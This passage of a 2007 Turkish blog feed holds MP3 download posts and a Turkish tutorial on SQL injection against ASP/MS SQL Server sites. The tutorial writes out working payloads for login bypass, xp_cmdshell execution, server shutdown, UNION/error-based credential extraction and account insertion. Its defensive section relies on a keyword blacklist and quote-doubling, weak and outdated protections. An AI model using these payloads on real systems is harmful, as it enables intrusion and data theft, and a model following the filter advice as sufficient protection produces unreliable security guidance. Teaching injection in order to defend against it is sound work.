karaibrahimgil - bu mudur ? - mp3</title><content type='html'>&lt;a href="http://www.divshare.com/download/544339-11c" target"_blank"&gt;indir&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;nil karaibrahimgil den bumudur mp3, hemen indir...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-6979311148136721031?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/6979311148136721031/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=6979311148136721031' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/6979311148136721031'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/6979311148136721031'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/05/nil-karaibrahimgil-bu-mudur-mp3.html' title='nil karaibrahimgil - bu mudur ? - mp3'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-2405730801919548845</id><published>2007-04-21T12:27:00.000+02:00</published><updated>2007-05-01T12:24:28.799+02:00</updated><title type='text'>göksel yarabbi şükür...</title><content type='html'>&lt;a href="http://www.divshare.com/download/447290-2ad" target"_blank"&gt;goksel-yarabbi_sukur_ynlzbn_.MP3&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;göksel yarabbi şükür - mp3 hemen indir&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-2405730801919548845?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/2405730801919548845/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=2405730801919548845' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/2405730801919548845'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/2405730801919548845'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/gksel-yarabbi-kr.html' title='göksel yarabbi şükür...'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-6410229684661731978</id><published>2007-04-17T12:56:00.000+02:00</published><updated>2007-04-17T13:00:41.631+02:00</updated><title type='text'>para üstünde sizin resminiz olsun</title><content type='html'>&lt;a href="http://www.festisite.com/tools/generators/money/"&gt;http://www.festisite.com/tools/generators/money/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-6410229684661731978?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/6410229684661731978/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=6410229684661731978' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/6410229684661731978'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/6410229684661731978'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/para-stnde-sizin-resminiz-olsun.html' title='para üstünde sizin resminiz olsun'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-8415773010967342850</id><published>2007-04-14T11:07:00.000+02:00</published><updated>2007-04-14T11:08:12.787+02:00</updated><title type='text'>SQL Enjeksiyon Saldırıları &amp; Korunma Yolları</title><content type='html'>Dünyanın her tarafında, kullanıcılarına; kredi kartı numaraları, kullanıcı bilgileri gibi gizli kalması gereken bilgilerin, ürünlere ve siparişlere ait verilerin saklandığı uç-arka veri depolarıyla hizmet veren web siteleri bulunmaktadır. Ve genel olarak, web sitelerindeki form aracılığı ile alınan girdi ile veritabanındaki bilgiler filtrelendikten sonra sonucu kullanıcıya gönderen bu tür sistemlerde Yapısal Sorgulama Dili (Structured Query Language - SQL) kullanılmaktadır. Uygulama içerisinde kullanılacak parametre değerleri alınırken kullanılan formun SQL Deyimini yeniden yapılandırabilecek bazı özel karakterlere izin vermesiyle güvenlik problemleri ortaya çıkmaktadır.&lt;br /&gt;&lt;br /&gt;Bu güvenlik problemleri kullanılarak bir uygulamanın arkasında, bu uygulamaya destek veren veri tabanı üzerindeki bütün bilgilere ulaşılabilir veya bilgiler üzerinde değişiklik yapılabilir. Veya veri tabanı sisteminin komutları kullanılarak kullanılan sunucular üzerinde uygulama harici istenen işlemler de yapılabilir. Bu problemlerden korunmak için de uygulama girdilerini bu tür karakterlere karşı kontrol eden fonksiyonların kullanılmalı ve geniş çaplı uygulamaların bu güvenlik açıklarını taşıyıp taşımadığını anlamak için güvenlik denetimine tabi tutulmalıdır..&lt;br /&gt;&lt;br /&gt;İlgilendiren Sektör ve Şirketler:&lt;br /&gt;&lt;br /&gt;* Özel olarak geliştirilmiş uygulamalar kullanan tüm kurum ve kuruluşlar&lt;br /&gt;* Internet / Intranet üzerinde uygulama geliştiren kuruluşlar&lt;br /&gt;&lt;br /&gt;1. Bir Uygulama Güvenliği Problemi - "Yapısal Sorgulama Dili Kullanımı"&lt;br /&gt;&lt;br /&gt;Yapısal Sorgulama Dili SQL'in uygulamalarda kullanımına örnek vermek gerekirse;&lt;br /&gt;&lt;br /&gt;SELECT Name, Address FROM Users WHERE UserID = '1111'&lt;br /&gt;&lt;br /&gt;Şeklindeki SQL Deyimi "Users" adlı tablodan "1111" ürün ID si ile veritabanına kayıtlı olan kişiye ait olan isim ve adres bilgilerini dönecektir. Bu noktada muhtemel zayıflık, kullanılan formun SQL Deyimini yeniden yapılandırabilecek bazı özel karakterlere izin vermesiyle ortaya çıkmaktadır. Çözümü ise girdilerden bu özel karakterlerin filtrelenmesini sağlayan fonksiyonlardır.&lt;br /&gt;&lt;br /&gt;Hızla gelişen internet teknolojileri karşısında yeni pazarda geç olmadan yerini almak isteyen müşterilerine daha kısa sürede daha kullanışlı ve ucuz çözümler sunmak zorunda olan uygulama geliştiriciler bu süreçte güvenlik gibi önemli bir faktörü ikinci plana atmaktadırlar.&lt;br /&gt;&lt;br /&gt;Giderek yaygınlaşan ve medyanın haber potansiyelini oluşturan; çalınan kredi kartı numaraları, yer altı sitelerde dağıtılan müşteri bilgileri, şirket projeleri - yazışmaları yaklaşan tehlikenin habercisi olmakla beraber halen bu tür kayıpların yaratabileceği maddi sonuçları kavrayamayan ve hala "az maliyetle kurtarılan güvenlik projeleri" 'yle övünen yöneticilere uyarı niteliği taşımaktadır. Öyleki -herzaman bir adım önde olmayı amaçlayan- saldırganlar güvenliğin en üst seviyede olması beklenen devlet siteleri de dahil olmak üzere pek çok sisteme yönelik saldırılarına da ara vermeksizin devam etmektedirler.&lt;br /&gt;&lt;br /&gt;Maddi ve manevi değere sahip şirketinizi bir anlamda iş ortaklarını olan uygulama geliştiricilerin hazırladıkları uygulama ürünlerine emanet edildiğini düşünürsek, "uygulamalarınıza ne kadar güvenirsiniz?" gibi bir soruya verilecek cevap büyük önem taşımaktadır.&lt;br /&gt;&lt;br /&gt;Böyle bir ortamda uygun güvenlik çözümü için ayrılmış bütçe bir lüks değil her an yapılabilecek bir saldırıda şirketin uğrayacağı zararı ortadan kaldırmak için alınması gereken önlem niteliği taşımaktadır.&lt;br /&gt;&lt;br /&gt;2. Örnek Saldırılar - "Yapılacak Hamleleri Önceden Tahmin Edebilmek..."&lt;br /&gt;&lt;br /&gt;Güvenlikte sıkça kullanılan bir deyim; "Saldırganlardan korunabilmek için onlar gibi düşünmelisiniz!..". Saldırganın sisteminize girmek için kullanabileceği yöntemleri bilmek bu saldırılardan korunabilmek için alınan önlemleri daha sağlıklı kılacaktır.&lt;br /&gt;&lt;br /&gt;Örneklerde kullanacağımız hedef ; Microsoft® Internet Information Server™' dan Microsoft® SQL Server™'a varsayılan sistem hesabı'ndan (sa) bağlanan ASP tabanlı bir kullanıcı hesabı yöneticisi olacak.&lt;br /&gt;Form.asp : Username ve Password girdisini alan form.Solda...&lt;br /&gt;Login.asp : Veritabanı ile bağlantıya geçen ve girdinin doğruluğunu kontrol eden ASP kodu.&lt;br /&gt;&lt;br /&gt;2.1. Kötü Amaçlı (') İmleçleri Yardımıyla İzinsiz Giriş Sağlama:&lt;br /&gt;&lt;br /&gt;Kullanıcı "Username" &amp; "Password" verisini Login.asp ye yolladıktan sonra .asp kodunun yapacağı iş verilen yoldaki veritabanı ile bağlantı kurup ilgili tabloda Username ve Password sütünlarında gönderilen verinin doğruluğunu kontrol etmek olacaktır. Bu işlem sonucunda eğer sonuç olumluysa kullanıcıya; "Giriş Yapıldı" olumsuzsa; "Geçersiz Kullanıcıadı &amp; Şifre" mesajı verilecektir.&lt;br /&gt;&lt;br /&gt;Örnekleyecek olursak;&lt;br /&gt;&lt;br /&gt;Username : xxxx&lt;br /&gt;Password : 1111&lt;br /&gt;&lt;br /&gt;Şeklindeki kullanıcı girdisi aşağıdaki SQL Deyimini oluşturacaktır;&lt;br /&gt;&lt;br /&gt;SELECT count(*) FROM Users WHERE Username = 'xxxx' AND Password = '1111'&lt;br /&gt;&lt;br /&gt;İlk bakışta sorun olmayan bir SQL Deyimi... Fakat saldırganın;&lt;br /&gt;&lt;br /&gt;Username : xxxx&lt;br /&gt;Password : ' OR 1=1--&lt;br /&gt;&lt;br /&gt;Şeklindeki girdilerle oluşturacağı SQL Deyimi ise;&lt;br /&gt;&lt;br /&gt;SELECT count(*) FROM Users WHERE Username = 'xxxx' AND Password = '' OR 1=1 --'&lt;br /&gt;&lt;br /&gt;Olacaktır ki, bu durumda girişin sağlanması için şart "xxxx" kullanıcı adına ait şifrenin hiçbirşey* olması veya ikinci bir opsiyon olarak 1=1 eşitliğinin sağlanmasıdır.&lt;br /&gt;&lt;br /&gt;* Hiçbişey = Boşluk&lt;br /&gt;&lt;br /&gt;Sonuç : 1=1 eşitliği sağlandığına göre saldırı başarıyla sonuçlanacak ve "Giriş Yapıldı" mesajı verilecektir.&lt;br /&gt;&lt;br /&gt;Not : Microsoft® SQL Server™ "--" imlecinden sonra gelen yersiz kullanılmış tırnak işaretlerini göz ardı edecektir. İlk bakışta basit gibi görünen ve sadece SQL Server'a ait olan bu özellik ilerde örneklerden de anlaşılacağı üzere saldırgana büyük kolaylık sağlayacaktır..&lt;br /&gt;&lt;br /&gt;2.2. Uzaktan Çalıştırılması Mümkün Olan Prosedürler:&lt;br /&gt;&lt;br /&gt;MS SQL Server'a varsayılan sistem hesabından yaptığımız bağlantı SQL Enjeksiyon saldırısında muhtemel saldırgana sunucuda saklanan prosedürleri çalıştırabilmesi için gerekli hakları tanıyacaktır. Saldırganın kullanabileceği prosedürlerden bir tanesi; "master..xp_cmdshell" olabilir.&lt;br /&gt;&lt;br /&gt;Username : xxxx&lt;br /&gt;Password : '; EXEC master..xp_cmdshell 'dir c:'--&lt;br /&gt;&lt;br /&gt;Girdileriyle oluşacak SQL Deyimi;&lt;br /&gt;&lt;br /&gt;SELECT count(*) FROM Users WHERE Username = 'xxxx' AND Password = ''; EXEC master..xp_cmdshell 'dir c:'--'&lt;br /&gt;&lt;br /&gt;Sonuç : SQL Server Kullanıcıadı ve Şifreyi bulunduran sütunları arayacaktır bulamadığı için "Yanlış Kullanıcıadı &amp; Şifre" mesajını verecektir fakat bu arada arka planda "dir c:" komutunu çalıştıracak ve saldırgan C sürücüsünün içeriğine ulaşacaktır.&lt;br /&gt;&lt;br /&gt;2.3. SQL Server Hedef Alınarak Yapılan Saldırılar:&lt;br /&gt;&lt;br /&gt;Yönetici haklarına sahip saldırgan silme,ekleme,değiştirme...vb gibi komutları rahatlıkla çalıştırabilecektir.&lt;br /&gt;&lt;br /&gt;SHUTDOWN WITH NOWAIT SQL Server'ın kritik komutlarından bir tanesidir. Komutla beraber SQL Server görevine son verir.&lt;br /&gt;&lt;br /&gt;Username : '; SHUTDOWN WITH NOWAIT--&lt;br /&gt;Password : [Boş]&lt;br /&gt;&lt;br /&gt;Bu girdilerle oluşturulan SQL Deyimi;&lt;br /&gt;&lt;br /&gt;SELECT Username FROM Users WHERE Username=''; SHUTDOWN WITH NOWAIT; --' AND Password=''&lt;br /&gt;&lt;br /&gt;Sonuç : SQL Server kullanıcıadının bulunamadığı mesajını verecektir. Fakat bununla beraber arka planda diğer komutu çalıştırdığı için SQL Server kapanacaktır.&lt;br /&gt;&lt;br /&gt;2.4. ODBC Hatalarından Faydalanarak Yapılan Saldırılar:&lt;br /&gt;&lt;br /&gt;SQL Server'ın verdiği hatalardan faydalanarak veritabanındaki neredeyse tüm bilgilere ulaşmak mümkündür.&lt;br /&gt;&lt;br /&gt;Hedef; http://Victim/Default.asp?id=10 şeklinde ürün ID leri ile çalışan ASP tabanlı bir websitesi.&lt;br /&gt;&lt;br /&gt;Saldırı SQL Server'ın integer ve string cinsinden verileri birlikte gönderememesinden faydalınarak yapılabilir;&lt;br /&gt;&lt;br /&gt;Gönderilen '10' sayısına veritabanından herhangi bir string eklenir.&lt;br /&gt;&lt;br /&gt;http://Victim/Default.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--&lt;br /&gt;&lt;br /&gt;Not: "INFORMATION_SCHEMA.TABLES" sistem tablosu, sistemde bulunan diğer tüm tablolar hakkında bilgi içerir. Deyimde kullanılan "TABLE_NAME" de &lt;br /&gt;yine tüm tablo isimlerini içerir.&lt;br /&gt;&lt;br /&gt;Oluşacak SQL Deyimi;&lt;br /&gt;&lt;br /&gt;SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES&lt;br /&gt;&lt;br /&gt;String -&gt; Integer dönüşümünü yapamayan SQL Server aşağıdaki hatayı verecektir.&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error '80040e07'&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Table1' to a column of data type int.&lt;br /&gt;/Default.asp, line 5&lt;br /&gt;&lt;br /&gt;Hata, saldırgana "Table1" olarak bulduğu cevabı integer a çeviremediğini (dolayısıyla veritabanındaki ilk tablo adının "Table1" olduğunu) belirtmektedir. &lt;br /&gt;Saldırgan diğer tabloların adını aşağıdaki şekilde öğrenebilir...&lt;br /&gt;&lt;br /&gt;http://Victim/Default.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('Table1')--&lt;br /&gt;&lt;br /&gt;Veya doğrudan LIKE komutunu kullanarak aradığı şeye daha kolay yoldan ulaşabilir;&lt;br /&gt;&lt;br /&gt;http://Victim/Default.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25Login%25'--&lt;br /&gt;&lt;br /&gt;SQL Server'ın vereceği hata;&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error '80040e07'&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Admin_Login' to a column of data type int.&lt;br /&gt;/Default.asp, line 5&lt;br /&gt;&lt;br /&gt;Admin_Login adında bir tablo olduğunu öğrenen saldırgan muhtemelen tablodaki ilk kullanıcıadı ve şifreye ulaşmak isteyecektir. İzleyebileceği yol ise;&lt;br /&gt;&lt;br /&gt;http://Victim/Default.asp?id=10 UNION SELECT TOP 1 Username FROM Admin_Login--&lt;br /&gt;&lt;br /&gt;Hata;&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error '80040e07'&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'xxxx' to a column of data type int.&lt;br /&gt;/Default.asp, line 5&lt;br /&gt;&lt;br /&gt;Bu şekilde "admin" kullanıcıadının varlığını doğrulayan saldırganın şifreyi ele geçirmek için kullanacağı girdi;&lt;br /&gt;&lt;br /&gt;http://Victim/Default.asp?id=10 UNION SELECT TOP 1 Password FROM Admin_Login WHERE Username='xxxx'--&lt;br /&gt;&lt;br /&gt;Hata;&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error '80040e07'&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '1111' to a column of data type int.&lt;br /&gt;/Default.asp, line 5&lt;br /&gt;&lt;br /&gt;Sonuç :&lt;br /&gt;Username : xxxx&lt;br /&gt;Password : 1111&lt;br /&gt;&lt;br /&gt;2.5. Veritabanına Ekleme Yapma veya Veri Düzenleme:&lt;br /&gt;Kullanıcıadı ve şifre bilgisine ulaşan muhtemel saldırgan benzer yöntemleri ve UPDATE,INSERT komutlarını kullanarak şifreyi değiştirebilir veya daha temizi başka bir kullanıcı hesabı açabilir...&lt;br /&gt;&lt;br /&gt;http://Victim/Default.asp?id=10; UPDATE 'Admin_Login' SET 'Password' = 'NewPwd' WHERE Username='xxxx'--&lt;br /&gt;&lt;br /&gt;Yeni bir kullanıcı hesabı için;&lt;br /&gt;&lt;br /&gt;http://Victim/Default.asp?id=10; INSERT INTO 'Admin_Login' ('UserID', 'Username', 'Password', 'Details') VALUES (666,'aaaaa','1111','N/A')--&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. Nasıl Korunmalı? - "Aksi Doğrulanıncaya Kadar Tüm Kullanıcı Girdileri Kötüdür..."&lt;br /&gt;&lt;br /&gt;Gelebilecek SQL Enjeksiyon saldırılarından korunabilmek için alınan önlemlerde temel alınması geren nokta... "Aksi doğrulanıncaya kadar tüm kullanıcı girdileri kötüdür!".&lt;br /&gt;&lt;br /&gt;3.1. Kullanıcı Haklarının Sınırlandırılması&lt;br /&gt;&lt;br /&gt;Yaygın olarak yapılan hata; Web Server dan SQL Server a yapılan bağlantılarda varsayılan sistem hesabı kullanılması... Bu şekilde yönetici haklarına sahip olan saldırgan örneklerde de görülebileceği üzere isteği komutu çalıştırıp istediği ekleme,silme,düzeltme eylemini gerçekleştirebilecektir. Bunu yerine yapılması gereken yeni bir kullanıcı hesabı oluşturup kullanıcının çalıştırabileceği komutları sınırlandırmak olacaktır.&lt;br /&gt;&lt;br /&gt;Mesela sitenizden ürünlerinizin incelenmesine ve bunlar arasından sipariş verilmesine izin verecekseniz, "web_user" gibi bir kullanıcı adı oluşturup ürünleri incelemek için; ürünler sütununda sadece "SELECT" kullanımına ve siparişleri için; siparişler sütununda sadece "INSERT" kullanımına izin vermeniz uygun olacaktır.&lt;br /&gt;&lt;br /&gt;3.2. Girdilerde Tırnak İmleçlerinin (') Kötü Amaçlı Kullanımının Engellenmesi&lt;br /&gt;&lt;br /&gt;Yaygın SQL Enjeksiyon saldırıları SQL deyimlerinin girdilerdeki gereksiz (') tırnak işaretleri yardımıyla yeniden oluşturulması sayesinde yapılır.&lt;br /&gt;&lt;br /&gt;Küçük bir filtreleme fonksiyonu veya tek tırnağı çift tırnağa çeviren bir fonksiyon muhtemel bir saldırıyı engellmek için yeterli olabilir.&lt;br /&gt;&lt;br /&gt;ASP Kullanarak girdileri kontrol ederek değiştiren bir fonksiyon kolaylıkla yazılabilir;&lt;br /&gt;&lt;br /&gt;&lt;%&lt;br /&gt;Function ReplaceQuotes(strWords)&lt;br /&gt;ReplaceQuotes = Replace(strWords,”’”,”””;)&lt;br /&gt;End Function&lt;br /&gt;%&gt;&lt;br /&gt;&lt;br /&gt;Bu fonksiyonu baştaki örnekte kullanırsak;&lt;br /&gt;&lt;br /&gt;SELECT count(*) FROM Users WHERE Username='xxxx' AND Password='' OR 1=1 --'&lt;br /&gt;&lt;br /&gt;şeklinde olan deyim...&lt;br /&gt;&lt;br /&gt;SELECT count(*) FROM Users WHERE Username='xxxx' AND Password='" OR 1=1 --'&lt;br /&gt;&lt;br /&gt;'e dönüşecektir.&lt;br /&gt;&lt;br /&gt;3.3. Form Girdilerinden Gereksiz Karakterlerin Elenmesi&lt;br /&gt;&lt;br /&gt;SQL Enjeksiyon saldırıları genelde ";, --,SELECT, INSERT ve xp_" gibi karakterlerin-kelimelerin kullanılmasıyla yapıldığı için gönderilecek girdinin önce bir filtreleme fonksiyonundan geçirilmesi muhtemel zayıflığı engelleyebilir.Örneğin kullanıcıdan E - Mail adresini girmesi isteniyorsa harfler ve sayıların yanında sadece " @,-,_,." karakterlerinin kullanılmasına izin verilmelidir.&lt;br /&gt;&lt;br /&gt;Ve sunucuda saklanan xp_cmdshell ve xp_grantlogin gibi genel prosedürler,C/C++ tabanlı DLL ler, kullanıcı taraflı fonksiyonlar...vb, izole edilmiş bir sunucuya taşınmalıdır. Bazı zararlı kelime-harfleri filteleyen ASP fonksiyonu aşağıda örneklenmiştir;&lt;br /&gt;&lt;br /&gt;&lt;%&lt;br /&gt;Function FilterBadWords(strWords)&lt;br /&gt;dim BadWords&lt;br /&gt;dim NewWords&lt;br /&gt;BadWords = array("SELECT", "DROP", ";", "--", "INSERT", "DELETE", "xp_";)&lt;br /&gt;NewWords = strWords&lt;br /&gt;for i = 0 to uBound(BadWords)&lt;br /&gt;NewWords = Replace(NewWords, BadWords(i), "";)&lt;br /&gt;Next&lt;br /&gt;FilterBadWords = NewWords&lt;br /&gt;End Function&lt;br /&gt;%&gt;&lt;br /&gt;&lt;br /&gt;Tırnak değiştirme fonksiyonu ve filtreleme fonksiyonu beraber kullanılırsa;&lt;br /&gt;&lt;br /&gt;SELECT Username FROM Users WHERE Usename=''; EXEC master..xp_cmdshell 'dir c'; --' AND Password=''&lt;br /&gt;&lt;br /&gt;Şeklindeki SQL Deyimi...&lt;br /&gt;&lt;br /&gt;SELECT Username FROM Users WHERE Usename='" EXEC master.. cmdshell "dir c:" ' AND Password=''&lt;br /&gt;&lt;br /&gt;e dönüşecektir ki bu da herhangi bir kayıt bulumadığı hatasını vermekten öteye gitmeyecektir.&lt;br /&gt;&lt;br /&gt;Bu fonksiyonu kullanıcıdan gelen bütün girdilere, adres satırı ifadelerine ve çerezlerden gelen tüm veriye uygulamamız gelebilecek saldırının önüne geçecektir.&lt;br /&gt;&lt;br /&gt;3.4. Girdi Uzunluğunun Sınırlandırılması&lt;br /&gt;&lt;br /&gt;Veritabanındaki ayrılan alanın uzunluğu 10 karakterlikse, formunuzda bu alan için 50 karakter sığan bir text kutusuna sahip olmanız sakıncalı olabilir. Ve mümkün olduğu kadar girdi uzunluklarını kısa tutmak muhtemel saldırıyı engellemek için önlem sayılabilir.&lt;br /&gt;&lt;br /&gt;3.5. Girdi Cinsinin Kontrol Edilmesi&lt;br /&gt;&lt;br /&gt;Formunuzdan girilen verinin istediğiniz türden bir veri olup olmadığını kontrol eden bir fonksiyon kötü amaçlı kullanımlarda saldırganın kullanabileceği harf/sayı seçeneğini kısıtlayacaktır. Mesela, eğer Ürün ID si için formunuzdan girdi alıyorsanız girdinin sayısal bir ifade olup olmadığını kontrol eden bir fonksiyon fayda sağlayacaktır.&lt;br /&gt;&lt;br /&gt;3.6. Girdi Cinsinin Kontrol Edilmesi&lt;br /&gt;&lt;br /&gt;Formunuz aracılığı ile topladığınız verileri yollarken mutlaka "POST" metodunu kullanın ki kullanıcılarınız adres çubuğunda girdikleri verilerle beraber form değerlerini gördüklerinde akıllarına farklı fikirler gelmesin.&lt;br /&gt;&lt;br /&gt;4. Son Söz - "Herzaman bir adım önde!"&lt;br /&gt;&lt;br /&gt;Aldığınız güvenlik önlemleri veya (en iyi ihtimalle) yazıp da kullanmayı bir alışkanlık haline getiremediğiniz güvenlik politikaları sizi güvenlik problemlerine karşı koruyabilir mi? Eğer güvenlik ile ilgili problemleri yönetmeyi süreç temelli bir güvenlik bilinci içerisinde ele almıyorsanız hiçbir güvenlik ürünü, bir güvenlik kaybına uğramanızı engelleyemez.&lt;br /&gt;&lt;br /&gt;Bilgi sistemleri altyapınızı taşıdıkları güvenlik zaaflarına karşı düzenli olarak kontrol ettirmek, risklerinizi takip etmek, doğru teknolojiyi doğru yerde ve doğru şekilde kullanmanızı sağlayacak güvenlik politikalarınızı oluşturup güvenlik probleminizi sürekli yönetebilecek olgunluğa ulaşmak hedeflenmelidir. Bilgi sistemlerinin önemli bir kısmını oluşturan uygulamaların taşıyabileceği güvenlik sorunları uzun süredir ihmal edilmelerinden dolayı, günümüzün en popüler sistem sızma noktalarını teşkil etmektedirler. Bu nedenle uygulama güvenliğine ilişkin gereken önemi vermeniz, güvenlik denetimi yaptırmanız ve kurumunuzun bilgi güvenliği yönetim sistemini oluşturmaya bir yerinden başlamanızı öneriyoruz.&lt;br /&gt;&lt;br /&gt;Yazan: Yazarın isteği üzerine ismi kaldırıldı.(Anonim)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-8415773010967342850?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/8415773010967342850/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=8415773010967342850' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/8415773010967342850'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/8415773010967342850'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/sql-enjeksiyon-saldrlar-korunma-yollar.html' title='SQL Enjeksiyon Saldırıları &amp; Korunma Yolları'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-7880066620029006330</id><published>2007-04-13T13:58:00.000+02:00</published><updated>2007-04-13T14:02:48.939+02:00</updated><title type='text'>çekim hataları</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_-KqcQ8itj2c/Rh9xHARtgFI/AAAAAAAAABE/KALH4hAg2-w/s1600-h/film_hatalari-4.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;" src="http://bp2.blogger.com/_-KqcQ8itj2c/Rh9xHARtgFI/AAAAAAAAABE/KALH4hAg2-w/s320/film_hatalari-4.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5052881672080293970" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_-KqcQ8itj2c/Rh9wwgRtgEI/AAAAAAAAAA8/oYV0oqRBEog/s1600-h/film_hatalari-3.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_-KqcQ8itj2c/Rh9wwgRtgEI/AAAAAAAAAA8/oYV0oqRBEog/s320/film_hatalari-3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5052881285533237314" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_-KqcQ8itj2c/Rh9wlwRtgDI/AAAAAAAAAA0/1BEWxGiIOc4/s1600-h/film_hatalari-2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;" src="http://bp1.blogger.com/_-KqcQ8itj2c/Rh9wlwRtgDI/AAAAAAAAAA0/1BEWxGiIOc4/s320/film_hatalari-2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5052881100849643570" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_-KqcQ8itj2c/Rh9wewRtgCI/AAAAAAAAAAs/jBkfBGo5Diw/s1600-h/film_hatalari-1.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;" src="http://bp1.blogger.com/_-KqcQ8itj2c/Rh9wewRtgCI/AAAAAAAAAAs/jBkfBGo5Diw/s320/film_hatalari-1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5052880980590559266" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-7880066620029006330?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/7880066620029006330/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=7880066620029006330' title='0 Yorum'/><link 